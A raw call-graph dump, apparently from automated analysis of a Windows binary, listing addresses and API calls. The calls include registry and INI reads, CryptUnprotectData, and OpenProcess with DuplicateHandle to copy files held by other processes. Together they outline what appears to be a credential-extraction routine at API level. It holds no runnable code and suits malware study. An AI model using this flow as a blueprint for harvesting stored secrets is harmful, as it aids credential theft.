40aebe FindClose 38838->38839 38841 40c26f 38839->38841 38840 40add4 2 API calls 38840->38842 38847 40e5ed memset memset 38841->38847 38842->38837 38842->38838 38842->38840 38843 40c231 _wcsicmp 38842->38843 38845 40c1d3 34 API calls 38842->38845 38843->38842 38844 40c248 38843->38844 38860 40c084 21 API calls 38844->38860 38845->38842 38848 414c2e 16 API calls 38847->38848 38849 40e63f 38848->38849 38850 409d1f 6 API calls 38849->38850 38851 40e658 38850->38851 38861 409b98 GetFileAttributesW 38851->38861 38853 40e667 38854 409d1f 6 API calls 38853->38854 38856 40e680 38853->38856 38854->38856 38862 409b98 GetFileAttributesW 38856->38862 38857 40e68f 38858 40c2d8 38857->38858 38863 40e4b2 38857->38863 38858->38784 38858->38785 38860->38842 38861->38853 38862->38857 38884 40e01e 38863->38884 38865 40e593 38866 40e5b0 38865->38866 38867 40e59c DeleteFileW 38865->38867 38868 40b04b ??3@YAXPAX 38866->38868 38867->38866 38870 40e5bb 38868->38870 38869 40e521 38869->38865 38907 40e175 38869->38907 38872 40e5c4 CloseHandle 38870->38872 38873 40e5cc 38870->38873 38872->38873 38875 40b633 free 38873->38875 38874 40e573 38876 40e584 38874->38876 38877 40e57c CloseHandle 38874->38877 38878 40e5db 38875->38878 38928 40b1ab free free 38876->38928 38877->38876 38879 40b633 free 38878->38879 38881 40e5e3 38879->38881 38881->38858 38883 40e540 38883->38874 38927 40e2ab 30 API calls 38883->38927 38885 406214 22 API calls 38884->38885 38886 40e03c 38885->38886 38887 40e16b 38886->38887 38888 40dd85 60 API calls 38886->38888 38887->38869 38889 40e06b 38888->38889 38889->38887 38890 40afcf ??2@YAPAXI ??3@YAXPAX 38889->38890 38891 40e08d OpenProcess 38890->38891 38892 40e0a4 GetCurrentProcess DuplicateHandle 38891->38892 38896 40e152 38891->38896 38893 40e0d0 GetFileSize 38892->38893 38894 40e14a CloseHandle 38892->38894 38897 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38893->38897 38894->38896 38895 40e160 38899 40b04b ??3@YAXPAX 38895->38899 38896->38895 38898 406214 22 API calls 38896->38898 38900 40e0ea 38897->38900 38898->38895 38899->38887 38901 4096dc CreateFileW 38900->38901 38902 40e0f1 CreateFileMappingW 38901->38902 38903 40e140 CloseHandle CloseHandle 38902->38903 38904 40e10b MapViewOfFile 38902->38904 38903->38894 38905 40e13b CloseHandle 38904->38905 38906 40e11f WriteFile UnmapViewOfFile 38904->38906 38905->38903 38906->38905 38908 40e18c 38907->38908 38909 406b90 11 API calls 38908->38909 38910 40e19f 38909->38910 38911 40e1a7 memset 38910->38911 38912 40e299 38910->38912 38917 40e1e8 38911->38917 38913 4069a3 ??3@YAXPAX free 38912->38913 38914 40e2a4 38913->38914 38914->38883 38915 406e8f 13 API calls 38915->38917 38916 406b53 SetFilePointerEx ReadFile 38916->38917 38917->38915 38917->38916 38918 40e283 38917->38918 38919 40dd50 _wcsicmp 38917->38919 38923 40742e 8 API calls 38917->38923 38924 40aae3 wcslen wcslen _memicmp 38917->38924 38925 40e244 _snwprintf 38917->38925 38920 40e291 38918->38920 38921 40e288 free 38918->38921 38919->38917 38922 40aa04 free 38920->38922 38921->38920 38922->38912 38923->38917 38924->38917 38926 40a8d0 7 API calls 38925->38926 38926->38917 38927->38883 38928->38865 38930 40a980 38929->38930 38931 40a8bb 38930->38931 38932 40a995 _wcsicmp 38930->38932 38933 40a99c wcscmp 38930->38933 38931->38804 38931->38805 38932->38930 38933->38930 38934->38808 38935->38812 38937 40aa23 RegEnumValueW 38936->38937 38937->38819 38937->38820 38939 40522a 38938->38939 38964 405329 38938->38964 38940 40b2cc 27 API calls 38939->38940 38941 405234 38940->38941 38942 40a804 8 API calls 38941->38942 38943 40523a 38942->38943 38965 40b273 38943->38965 38945 405248 _mbscpy _mbscat 38946 40526c 38945->38946 38947 40b273 27 API calls 38946->38947 38948 405279 38947->38948 38949 40b273 27 API calls 38948->38949 38950 40528f 38949->38950 38951 40b273 27 API calls 38950->38951 38952 4052a5 38951->38952 38953 40b273 27 API calls 38952->38953 38954 4052bb 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052d1 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052e7 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052fd 38959->38960 38961 40b273 27 API calls 38960->38961 38962 405313 38961->38962 38963 40b273 27 API calls 38962->38963 38963->38964 38964->38830 38966 40b58d 27 API calls 38965->38966 38967 40b18c 38966->38967 38967->38945 38969 40440c FreeLibrary 38968->38969 38970 40436d 38969->38970 38971 40a804 8 API calls 38970->38971 38972 404377 38971->38972 38973 4043f7 38972->38973 38974 40b273 27 API calls 38972->38974 38973->38409 38973->38413 38975 40438d RtlAllocateHeap 38974->38975 38976 40b273 27 API calls 38975->38976 38977 4043a7 38976->38977 38978 40b273 27 API calls 38977->38978 38979 4043ba 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043ce 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043e2 38982->38983 38983->38973 38984 40440c FreeLibrary 38983->38984 38984->38973 38986 404413 FreeLibrary 38985->38986 38987 40441e 38985->38987 38986->38987 38987->38425 38988->38422 38990 40447e 38989->38990 38991 40442e 38989->38991 38992 404485 CryptUnprotectData 38990->38992 38993 40449c 38990->38993 38994 40b2cc 27 API calls 38991->38994 38992->38993 38993->38422 38995 404438 38994->38995 38996 40a804 8 API calls 38995->38996 38997 40443e 38996->38997 38998 40444f 38997->38998 38999 40b273 27 API calls 38997->38999 38998->38990 39000 404475 FreeLibrary 38998->39000 38999->38998 39000->38990 39002 4135f6 39001->39002 39003 4135eb FreeLibrary 39001->39003 39002->38428 39003->39002 39005 4449c4 39004->39005 39006 444a48 39004->39006 39007 40b2cc 27 API calls 39005->39007 39006->38448 39006->38449 39008 4449cb 39007->39008 39009 40a804 8 API calls 39008->39009 39010 4449d1 39009->39010 39011 40b273 27 API calls 39010->39011 39012 4449dc 39011->39012 39013 40b273 27 API calls 39012->39013 39014 4449f3 39013->39014 39015 40b273 27 API calls 39014->39015 39016 444a04 39015->39016 39017 40b273 27 API calls 39016->39017 39018 444a15 39017->39018 39019 40b273 27 API calls 39018->39019 39020 444a26 39019->39020 39021 40b273 27 API calls 39020->39021 39022 444a37 39021->39022 39023 40b273 27 API calls 39022->39023 39023->39006 39024->38458 39025->38458 39026->38458 39027->38458 39028->38450 39030 403a29 39029->39030 39044 403bed memset memset 39030->39044 39032 403ae7 39057 40b1ab free free 39032->39057 39033 403a3f memset 39038 403a2f 39033->39038 39035 403aef 39035->38466 39036 409d1f 6 API calls 39036->39038 39037 409b98 GetFileAttributesW 39037->39038 39038->39032 39038->39033 39038->39036 39038->39037 39039 40a8d0 7 API calls 39038->39039 39039->39038 39041 40a051 GetFileTime CloseHandle 39040->39041 39042 4039ca CompareFileTime 39040->39042 39041->39042 39042->38466 39043->38467 39045 414c2e 16 API calls 39044->39045 39046 403c38 39045->39046 39047 409719 2 API calls 39046->39047 39048 403c3f wcscat 39047->39048 39049 414c2e 16 API calls 39048->39049 39050 403c61 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c68 wcscat 39051->39052 39058 403af5 39052->39058 39055 403af5 20 API calls 39056 403c95 39055->39056 39056->39038 39057->39035 39059 403b02 39058->39059 39060 40ae18 9 API calls 39059->39060 39068 403b37 39060->39068 39061 403bdb 39063 40aebe FindClose 39061->39063 39062 40add4 wcscmp wcscmp 39062->39068 39064 403be6 39063->39064 39064->39055 39065 40ae18 9 API calls 39065->39068 39066 40ae51 9 API calls 39066->39068 39067 40aebe FindClose 39067->39068 39068->39061 39068->39062 39068->39065 39068->39066 39068->39067 39069 40a8d0 7 API calls 39068->39069 39069->39068 39071 409d1f 6 API calls 39070->39071 39072 404190 39071->39072 39085 409b98 GetFileAttributesW 39072->39085 39074 40419c 39075 4041a7 6 API calls 39074->39075 39076 40435c 39074->39076 39077 40424f 39075->39077 39076->38489 39077->39076 39079 40425e memset 39077->39079 39081 409d1f 6 API calls 39077->39081 39082 40a8ab 9 API calls 39077->39082 39086 414842 39077->39086 39079->39077 39080 404296 wcscpy 39079->39080 39080->39077 39081->39077 39083 4042b6 memset memset _snwprintf wcscpy 39082->39083 39083->39077 39084->38492 39085->39074 39089 41443e 39086->39089 39088 414866 39088->39077 39090 41444b 39089->39090 39091 414451 39090->39091 39092 4144a3 GetPrivateProfileStringW 39090->39092 39093 414491 39091->39093 39094 414455 wcschr 39091->39094 39092->39088 39096 414495 WritePrivateProfileStringW 39093->39096 39094->39093 39095 414463 _snwprintf 39094->39095 39095->39096 39096->39088 39097->38497 39099 40b2cc 27 API calls 39098->39099 39100 409615 39099->39100 39101 409d1f 6 API calls 39100->39101 39102 409625 39101->39102 39125 409b98 GetFileAttributesW 39102->39125 39104 409634 39105 409648 39104->39105 39142 4091b8 238 API calls 39104->39142 39107 40b2cc 27 API calls 39105->39107 39109 408801 39105->39109 39108 40965d 39107->39108 39110 409d1f 6 API calls 39108->39110 39109->38500 39109->38532 39111 40966d 39110->39111 39126 409b98 GetFileAttributesW 39111->39126 39113 40967c 39113->39109 39127 409529 39113->39127 39115->38522 39116->38532 39117->38527 39118->38532 39119->38533 39120->38534 39121->38538 39122->38540 39123->38543 39124->38532 39125->39104 39126->39113 39143 4096c3 CreateFileW 39127->39143 39129 409543 39130 4095cd 39129->39130 39131 409550 GetFileSize 39129->39131 39130->39109 39132 409577 CloseHandle 39131->39132 39133 40955f 39131->39133 39132->39130 39138 409585 39132->39138 39134 40afcf 2 API calls 39133->39134 39135 409569 39134->39135 39144 40a2ef ReadFile 39135->39144 39137 409574 39137->39132 39138->39130 39139 4095c3 39138->39139 39145 408b8d 38 API calls 39138->39145 39146 40908b 55 API calls 39139->39146 39142->39105 39143->39129 39144->39137 39145->39138 39146->39130 39174 413f4f 39147->39174 39150 413f37 K32GetModuleFileNameExW 39151 413f4a 39150->39151 39151->38561 39153 413969 wcscpy 39152->39153 39154 41396c wcschr 39152->39154 39166 413a3a 39153->39166 39154->39153 39156 41398e 39154->39156 39178 4097f7 wcslen wcslen _memicmp 39156->39178 39158 41399a 39159 4139a4 memset 39158->39159 39160 4139e6 39158->39160 39179 409dd5 GetWindowsDirectoryW wcscpy 39159->39179 39162 413a31 wcscpy 39160->39162 39163 4139ec memset 39160->39163 39162->39166 39180 409dd5 GetWindowsDirectoryW wcscpy 39163->39180 39164 4139c9 wcscpy wcscat 39164->39166 39166->38561 39167 413a11 memcpy wcscat 39167->39166 39169 413cb0 GetModuleHandleW 39168->39169 39170 413cda 39168->39170 39169->39170 39171 413cbf 39169->39171 39172 413ce3 GetProcessTimes 39170->39172 39173 413cf6 39170->39173 39171->39170 39172->38563 39173->38563 39175 413f2f 39174->39175 39176 413f54 39174->39176 39175->39150 39175->39151 39177 40a804 8 API calls 39176->39177 39177->39175 39178->39158 39179->39164 39180->39167 39181->38584 39182->38607 39184 409cf9 GetVersionExW 39183->39184 39185 409d0a 39183->39185 39184->39185 39185->38613 39185->38617 39186->38620 39187->38623 39188->38625 39189->38670 39191 40bba5 39190->39191 39306 40cc26 39191->39306 39194 40bd4b 39327 40cc0c 39194->39327 39199 40b2cc 27 API calls 39200 40bbef 39199->39200 39334 40ccf0 _wcsicmp 39200->39334 39202 40bbf5 39202->39194 39335 40ccb4 6 API calls 39202->39335 39204 40bc26 39205 40cf04 17 API calls 39204->39205 39206 40bc2e 39205->39206 39207 40bd43 39206->39207 39208 40b2cc 27 API calls 39206->39208 39209 40cc0c 4 API calls 39207->39209 39210 40bc40 39208->39210 39209->39194 39336 40ccf0 _wcsicmp 39210->39336 39212 40bc46 39212->39207 39213 40bc61 memset memset WideCharToMultiByte 39212->39213 39337 40103c strlen 39213->39337 39215 40bcc0 39216 40b273 27 API calls 39215->39216 39217 40bcd0 memcmp 39216->39217 39217->39207 39218 40bce2 39217->39218 39219 404423 37 API calls 39218->39219 39220 40bd10 39219->39220 39220->39207 39221 40bd3a LocalFree 39220->39221 39222 40bd1f memcpy 39220->39222 39221->39207 39222->39221 39223->38685 39397 4438b5 39224->39397 39226 44444c 39227 40b879 39226->39227 39411 415a6d 39226->39411 39227->38688 39227->38689 39230 444486 39232 4444b9 memcpy 39230->39232 39269 4444a4 39230->39269 39231 44469e 39231->39227 39462 443d90 110 API calls 39231->39462 39415 415258 39232->39415 39235 444524 39236 444541 39235->39236 39237 44452a 39235->39237 39418 444316 39236->39418 39452 416935 16 API calls 39237->39452 39241 444316 18 API calls 39242 444563 39241->39242 39243 444316 18 API calls 39242->39243 39244 44456f 39243->39244 39245 444316 18 API calls 39244->39245 39246 44457f 39245->39246 39246->39269 39432 432d4e 39246->39432 39249 444316 18 API calls 39250 4445b0 39249->39250 39436 41eed2 39250->39436 39252 4445cf 39253 4445d6 39252->39253 39254 4445ee 39252->39254 39453 416935 16 API calls 39253->39453 39454 43302c memset 39254->39454 39256 4445fa 39455 43302c memset 39256->39455 39259 444609 39259->39269 39456 416935 16 API calls 39259->39456 39261 444646 39457 434d4b 17 API calls 39261->39457 39263 44464d 39458 437655 16 API calls 39263->39458 39265 444653 39459 4442e6 11 API calls 39265->39459 39267 44465d 39267->39269 39460 416935 16 API calls 39267->39460 39461 4442e6 11 API calls 39269->39461 39500 438460 39270->39500 39272 40b8a4 39272->38695 39276 4251c4 39272->39276 39274 409a74 GetTempFileNameW 39273->39274 39275 409a66 GetWindowsDirectoryW 39273->39275 39274->38682 39275->39274 39597 424f07 11 API calls 39276->39597 39278 4251e4 39279 4251f7 39278->39279 39280 4251e8 39278->39280 39599 4250f8 39279->39599 39598 4446ea 11 API calls 39280->39598 39282 4251f2 39282->38720 39284 425209 39287 425249 39284->39287 39290 4250f8 126 API calls 39284->39290 39291 425287 39284->39291 39607 4384e9 134 API calls 39284->39607 39608 424f74 123 API calls 39284->39608 39287->39291 39609 424ff0 13 API calls 39287->39609 39290->39284 39611 415c7d 16 API calls 39291->39611 39292 425266 39292->39291 39610 415be9 memcpy 39292->39610 39294->38720 39295->38720 39296->38720 39297->38720 39298->38720 39299->38720 39300->38720 39301->38720 39302->38720 39303->38695 39304->38688 39305->38717 39338 4096c3 CreateFileW 39306->39338 39308 40cc34 39309 40cc3d GetFileSize 39308->39309 39311 40bbca 39308->39311 39310 40afcf 2 API calls 39309->39310 39312 40cc64 39310->39312 39311->39194 39318 40cf04 39311->39318 39339 40a2ef ReadFile 39312->39339 39314 40cc71 39340 40ab4a MultiByteToWideChar 39314->39340 39316 40cc95 CloseHandle 39317 40b04b ??3@YAXPAX 39316->39317 39317->39311 39319 40b633 free 39318->39319 39320 40cf14 39319->39320 39346 40b1ab free free 39320->39346 39322 40cf1b 39323 40bbdd 39322->39323 39325 40cfef 39322->39325 39347 40cd4b 39322->39347 39323->39194 39323->39199 39326 40cd4b 14 API calls 39325->39326 39326->39323 39328 40b633 free 39327->39328 39329 40cc15 39328->39329 39330 40aa04 free 39329->39330 39331 40cc1d 39330->39331 39396 40b1ab free free 39331->39396 39333 40b7d4 memset CreateFileW 39333->38675 39333->38676 39334->39202 39335->39204 39336->39212 39337->39215 39338->39308 39339->39314 39341 40ab6b 39340->39341 39345 40ab93 39340->39345 39342 40a9ce 4 API calls 39341->39342 39343 40ab74 39342->39343 39344 40ab7c MultiByteToWideChar 39343->39344 39344->39345 39345->39316 39346->39322 39348 40cd7b 39347->39348 39381 40aa29 39348->39381 39350 40cef5 39351 40aa04 free 39350->39351 39352 40cefd 39351->39352 39352->39322 39354 40aa29 6 API calls 39355 40ce1d 39354->39355 39356 40aa29 6 API calls 39355->39356 39357 40ce3e 39356->39357 39360 40ce6a 39357->39360 39389 40abb7 wcslen memmove 39357->39389 39358 40ce9f 39361 40a8d0 7 API calls 39358->39361 39360->39358 39392 40abb7 wcslen memmove 39360->39392 39365 40ceb5 39361->39365 39362 40ce56 39390 40aa71 wcslen 39362->39390 39364 40ce8b 39393 40aa71 wcslen 39364->39393 39371 40a8d0 7 API calls 39365->39371 39368 40ce5e 39391 40abb7 wcslen memmove 39368->39391 39369 40ce93 39394 40abb7 wcslen memmove 39369->39394 39373 40cecb 39371->39373 39395 40d00b malloc memcpy free free 39373->39395 39375 40cedd 39376 40aa04 free 39375->39376 39377 40cee5 39376->39377 39378 40aa04 free 39377->39378 39379 40ceed 39378->39379 39380 40aa04 free 39379->39380 39380->39350 39382 40aa33 39381->39382 39388 40aa63 39381->39388 39383 40aa44 39382->39383 39384 40aa38 wcslen 39382->39384 39385 40a9ce malloc memcpy free free 39383->39385 39384->39383 39386 40aa4d 39385->39386 39387 40aa51 memcpy 39386->39387 39386->39388 39387->39388 39388->39350 39388->39354 39389->39362 39390->39368 39391->39360 39392->39364 39393->39369 39394->39358 39395->39375 39396->39333 39398 4438d0 39397->39398 39399 4438c9 39397->39399 39463 415378 memcpy memcpy 39398->39463 39399->39226 39412 415a77 39411->39412 39413 415a8d 39412->39413 39414 415a7e memset 39412->39414 39413->39230 39414->39413 39416 4438b5 11 API calls 39415->39416 39417 41525d 39416->39417 39417->39235 39419 444328 39418->39419 39420 444423 39419->39420 39421 44434e 39419->39421 39466 4446ea 11 API calls 39420->39466 39422 432d4e 3 API calls 39421->39422 39424 44435a 39422->39424 39426 444375 39424->39426 39431 44438b 39424->39431 39425 432d4e 3 API calls 39427 4443ec 39425->39427 39464 416935 16 API calls 39426->39464 39429 444381 39427->39429 39465 416935 16 API calls 39427->39465 39429->39241 39431->39425 39433 432d58 39432->39433 39435 432d65 39432->39435 39467 432cc4 memset memset memcpy 39433->39467 39435->39249 39437 41eee2 39436->39437 39438 415a6d memset 39437->39438 39439 41ef23 39438->39439 39440 415a6d memset 39439->39440 39451 41ef2d 39439->39451 39441 41ef42 39440->39441 39445 41ef49 39441->39445 39468 41b7d9 39441->39468 39443 41ef66 39444 41ef74 memset 39443->39444 39443->39445 39446 41ef91 39444->39446 39449 41ef9e 39444->39449 39445->39451 39486 41b321 100 API calls 39445->39486 39482 41519d 39446->39482 39449->39445 39485 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39449->39485 39451->39252 39452->39269 39453->39269 39454->39256 39455->39259 39456->39261 39457->39263 39458->39265 39459->39267 39460->39269 39461->39231 39462->39227 39464->39429 39465->39429 39466->39429 39467->39435 39474 41b812 39468->39474 39469 415a6d memset 39470 41b8c2 39469->39470 39471 41b980 39470->39471 39472 41b902 memcpy memcpy memcpy memcpy memcpy 39470->39472 39477 41b849 39470->39477 39479 41b9ad 39471->39479 39488 4151e3 39471->39488 39472->39471 39474->39477 39481 41b884 39474->39481 39487 444706 11 API calls 39474->39487 39476 41ba12 39476->39477 39478 41ba32 memset 39476->39478 39477->39443 39478->39477 39479->39477 39491 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39479->39491 39481->39469 39481->39477 39492 4175ed 39482->39492 39485->39445 39486->39451 39487->39481 39490 41837f 54 API calls 39488->39490 39489 4151f9 39489->39479 39490->39489 39491->39476 39493 417570 SetFilePointer GetLastError GetLastError 39492->39493 39494 4175ff 39493->39494 39495 41760a ReadFile 39494->39495 39496 4151b3 39494->39496 39497 417637 39495->39497 39498 417627 GetLastError 39495->39498 39496->39449 39497->39496 39499 41763e memset 39497->39499 39498->39496 39499->39496 39512 41703f 39500->39512 39502 43847a 39503 43848a 39502->39503 39504 43847e 39502->39504 39519 438270 39503->39519 39549 4446ea 11 API calls 39504->39549 39509 4384bb 39510 438270 133 API calls 39509->39510 39511 438488 39510->39511 39511->39272 39513 417044 39512->39513 39514 41705c 39512->39514 39518 417055 39513->39518 39551 416760 11 API calls 39513->39551 39515 417075 39514->39515 39552 41707a 11 API calls 39514->39552 39515->39502 39518->39502 39553 415a91 39519->39553 39521 43828d 39522 438297 39521->39522 39523 438341 39521->39523 39526 4382d6 39521->39526 39596 415c7d 16 API calls 39522->39596 39557 44358f 39523->39557 39527 4382fb 39526->39527 39528 4382db 39526->39528 39590 415c23 memcpy 39527->39590 39588 416935 16 API calls 39528->39588 39529 438458 39529->39511 39550 424f26 122 API calls 39529->39550 39532 4382e9 39589 415c7d 16 API calls 39532->39589 39533 438305 39536 44358f 19 API calls 39533->39536 39539 438318 39533->39539 39535 438373 39538 438383 39535->39538 39591 4300e8 memset memset memcpy 39535->39591 39536->39539 39542 4383cd 39538->39542 39592 415c23 memcpy 39538->39592 39539->39535 39583 43819e 39539->39583 39541 4383f5 39543 438404 39541->39543 39544 43841c 39541->39544 39542->39541 39593 42453e 122 API calls 39542->39593 39594 416935 16 API calls 39543->39594 39595 416935 16 API calls 39544->39595 39549->39511 39550->39509 39551->39518 39552->39513 39554 415a9d 39553->39554 39555 415ab3 39554->39555 39556 415aa4 memset 39554->39556 39555->39521 39556->39555 39558 4435be 39557->39558 39559 443676 39558->39559 39562 4436ce 39558->39562 39565 442ff8 19 API calls 39558->39565 39567 44366c 39558->39567 39581 44360c 39558->39581 39560 443737 39559->39560 39563 442ff8 19 API calls 39559->39563 39566 443758 39559->39566 39564 442ff8 19 API calls 39560->39564 39561 441409 memset 39561->39566 39569 4165ff 11 API calls 39562->39569 39563->39560 39564->39566 39565->39558 39566->39561 39571 443775 39566->39571 39570 4169a7 11 API calls 39567->39570 39568 4437be 39572 416760 11 API calls 39568->39572 39573 4437de 39568->39573 39569->39559 39570->39559 39571->39568 39577 415c56 11 API calls 39571->39577 39572->39573 39574 42463b memset memcpy 39573->39574 39576 443801 39573->39576 39574->39576 39575 443826 39579 43bd08 memset 39575->39579 39576->39575 39578 43024d memset 39576->39578 39577->39568 39578->39575 39580 443837 39579->39580 39580->39581 39582 43024d memset 39580->39582 39581->39539 39582->39580 39584 438246 39583->39584 39586 4381ba 39583->39586 39584->39535 39585 41f432 109 API calls 39585->39586 39586->39584 39586->39585 39587 41f638 103 API calls 39586->39587 39587->39586 39588->39532 39589->39522 39590->39533 39591->39538 39592->39542 39593->39541 39594->39522 39595->39522 39596->39529 39597->39278 39598->39282 39600 425108 39599->39600 39606 42510d 39599->39606 39644 424f74 123 API calls 39600->39644 39603 42516e 39645 415c7d 16 API calls 39603->39645 39604 425115 39604->39284 39606->39604 39612 42569b 39606->39612 39607->39284 39608->39284 39609->39292 39610->39291 39611->39282 39622 4256f1 39612->39622 39640 4259c2 39612->39640 39617 4260dd 39657 424251 119 API calls 39617->39657 39618 429a4d 39625 429a66 39618->39625 39626 429a9b 39618->39626 39622->39618 39623 422aeb memset memcpy memcpy 39622->39623 39628 4260a1 39622->39628 39637 4259da 39622->39637 39638 429ac1 39622->39638 39622->39640 39643 425a38 39622->39643 39646 4227f0 memset memcpy 39622->39646 39647 422b84 15 API calls 39622->39647 39648 422b5d memset memcpy memcpy 39622->39648 39649 422640 13 API calls 39622->39649 39651 4241fc 11 API calls 39622->39651 39652 42413a 89 API calls 39622->39652 39623->39622 39658 415c56 11 API calls 39625->39658 39627 429a96 39626->39627 39660 416760 11 API calls 39626->39660 39661 424251 119 API calls 39627->39661 39655 415c56 11 API calls 39628->39655 39630 429a7a 39659 416760 11 API calls 39630->39659 39656 416760 11 API calls 39637->39656 39639 425ad6 39638->39639 39662 415c56 11 API calls 39638->39662 39639->39603 39640->39639 39650 415c56 11 API calls 39640->39650 39643->39640 39653 422640 13 API calls 39643->39653 39654 4226e0 12 API calls 39643->39654 39644->39606 39645->39604 39646->39622 39647->39622 39648->39622 39649->39622 39650->39637 39651->39622 39652->39622 39653->39643 39654->39643 39655->39637 39656->39617 39657->39639 39658->39630 39659->39627 39660->39627 39661->39638 39662->39637 39663->38755 39664->38763 39665 44dea5 39666 44deb5 FreeLibrary 39665->39666 39667 44dec3 39665->39667 39666->39667 39668 4147f3 39671 414561 39668->39671 39670 414813 39672 41456d 39671->39672 39673 41457f GetPrivateProfileIntW 39671->39673 39676 4143f1 memset _itow WritePrivateProfileStringW 39672->39676 39673->39670 39675 41457a 39675->39670 39676->39675 39677 44def7 39678 44df07 39677->39678 39679 44df00 ??3@YAXPAX 39677->39679 39680 44df17 39678->39680 39681 44df10 ??3@YAXPAX 39678->39681 39679->39678 39682 44df27 39680->39682 39683 44df20 ??3@YAXPAX 39680->39683 39681->39680 39684 44df37 39682->39684 39685 44df30 ??3@YAXPAX 39682->39685 39683->39682 39685->39684 39686 4287c1 39687 4287d2 39686->39687 39688 429ac1 39686->39688 39689 428818 39687->39689 39690 42881f 39687->39690 39704 425711 39687->39704 39699 425ad6 39688->39699 39756 415c56 11 API calls 39688->39756 39723 42013a 39689->39723 39751 420244 96 API calls 39690->39751 39695 4260dd 39750 424251 119 API calls 39695->39750 39697 4259da 39749 416760 11 API calls 39697->39749 39701 429a4d 39707 429a66 39701->39707 39708 429a9b 39701->39708 39704->39688 39704->39697 39704->39701 39705 422aeb memset memcpy memcpy 39704->39705 39710 4260a1 39704->39710 39719 4259c2 39704->39719 39722 425a38 39704->39722 39739 4227f0 memset memcpy 39704->39739 39740 422b84 15 API calls 39704->39740 39741 422b5d memset memcpy memcpy 39704->39741 39742 422640 13 API calls 39704->39742 39744 4241fc 11 API calls 39704->39744 39745 42413a 89 API calls 39704->39745 39705->39704 39752 415c56 11 API calls 39707->39752 39709 429a96 39708->39709 39754 416760 11 API calls 39708->39754 39755 424251 119 API calls 39709->39755 39748 415c56 11 API calls 39710->39748 39712 429a7a 39753 416760 11 API calls 39712->39753 39719->39699 39743 415c56 11 API calls 39719->39743 39722->39719 39746 422640 13 API calls 39722->39746 39747 4226e0 12 API calls 39722->39747 39724 42014c 39723->39724 39727 420151 39723->39727 39766 41e466 96 API calls 39724->39766 39726 420162 39726->39704 39727->39726 39728 4201b3 39727->39728 39729 420229 39727->39729 39730 4201b8 39728->39730 39731 4201dc 39728->39731 39729->39726 39732 41fd5e 85 API calls 39729->39732 39757 41fbdb 39730->39757 39731->39726 39736 4201ff 39731->39736 39763 41fc4c 39731->39763 39732->39726 39736->39726 39738 42013a 96 API calls 39736->39738 39738->39726 39739->39704 39740->39704 39741->39704 39742->39704 39743->39697 39744->39704 39745->39704 39746->39722 39747->39722 39748->39697 39749->39695 39750->39699 39751->39704 39752->39712 39753->39709 39754->39709 39755->39688 39756->39697 39758 41fbf8 39757->39758 39761 41fbf1 39757->39761 39771 41ee26 39758->39771 39762 41fc39 39761->39762 39781 4446ce 11 API calls 39761->39781 39762->39726 39767 41fd5e 39762->39767 39764 41ee6b 85 API calls 39763->39764 39765 41fc5d 39764->39765 39765->39731 39766->39727 39769 41fd65 39767->39769 39768 41fdab 39768->39726 39769->39768 39770 41fbdb 85 API calls 39769->39770 39770->39769 39772 41ee41 39771->39772 39773 41ee32 39771->39773 39782 41edad 39772->39782 39785 4446ce 11 API calls 39773->39785 39776 41ee3c 39776->39761 39779 41ee58 39779->39776 39787 41ee6b 39779->39787 39781->39762 39791 41be52 39782->39791 39785->39776 39786 41eb85 11 API calls 39786->39779 39788 41ee70 39787->39788 39789 41ee78 39787->39789 39829 41bf99 85 API calls 39788->39829 39789->39776 39792 41be6f 39791->39792 39793 41be5f 39791->39793 39798 41be8c 39792->39798 39823 418c63 memset memset 39792->39823 39822 4446ce 11 API calls 39793->39822 39795 41be69 39795->39776 39795->39786 39798->39795 39799 41bf3a 39798->39799 39801 41bed1 39798->39801 39802 41bee7 39798->39802 39826 4446ce 11 API calls 39799->39826 39803 41bef0 39801->39803 39805 41bee2 39801->39805 39802->39795 39827 41a453 85 API calls 39802->39827 39803->39802 39804 41bf01 39803->39804 39806 41bf24 memset 39804->39806 39808 41bf14 39804->39808 39824 418a6d memset memcpy memset 39804->39824 39812 41ac13 39805->39812 39806->39795 39825 41a223 memset memcpy memset 39808->39825 39811 41bf20 39811->39806 39813 41ac52 39812->39813 39814 41ac3f memset 39812->39814 39817 41ac6a 39813->39817 39828 41dc14 19 API calls 39813->39828 39815 41acd9 39814->39815 39815->39802 39818 41519d 6 API calls 39817->39818 39819 41aca1 39817->39819 39818->39819 39819->39815 39820 41acc0 memset 39819->39820 39821 41accd memcpy 39819->39821 39820->39815 39821->39815 39822->39795 39823->39798 39824->39808 39825->39811 39826->39802 39828->39817 39829->39789 39830 417bc5 39831 417c61 39830->39831 39836 417bda 39830->39836 39832 417bf6 UnmapViewOfFile CloseHandle 39832->39832 39832->39836 39834 417c2c 39834->39836 39842 41851e 18 API calls 39834->39842 39836->39831 39836->39832 39836->39834 39837 4175b7 39836->39837 39838 4175d6 CloseHandle 39837->39838 39839 4175c8 39838->39839 39840 4175df 39838->39840 39839->39840 39841 4175ce Sleep 39839->39841 39840->39836 39841->39838 39842->39834 39843 4148b6 FindResourceW 39844 4148cf SizeofResource 39843->39844 39847 4148f9 39843->39847 39845 4148e0 LoadResource 39844->39845 39844->39847 39846 4148ee LockResource 39845->39846 39845->39847 39846->39847 39848 441b3f 39858 43a9f6 39848->39858 39850 441b61 40031 4386af memset 39850->40031 39852 44189a 39853 4418e2 39852->39853 39855 442bd4 39852->39855 39856 4418ea 39853->39856 40032 4414a9 12 API calls 39853->40032 39855->39856 40033 441409 memset 39855->40033 39859 43aa20 39858->39859 39866 43aadf 39858->39866 39860 43aa34 memset 39859->39860 39859->39866 39861 43aa56 39860->39861 39862 43aa4d 39860->39862 40034 43a6e7 39861->40034 40042 42c02e memset 39862->40042 39866->39850 39868 43aad3 40044 4169a7 11 API calls 39868->40044 39869 43aaae 39869->39866 39869->39868 39884 43aae5 39869->39884 39870 43ac18 39873 43ac47 39870->39873 40046 42bbd5 memcpy memcpy memcpy memset memcpy 39870->40046 39874 43aca8 39873->39874 40047 438eed 16 API calls 39873->40047 39877 43acd5 39874->39877 40049 4233ae 11 API calls 39874->40049 40050 423426 11 API calls 39877->40050 39878 43ac87 40048 4233c5 16 API calls 39878->40048 39882 43ace1 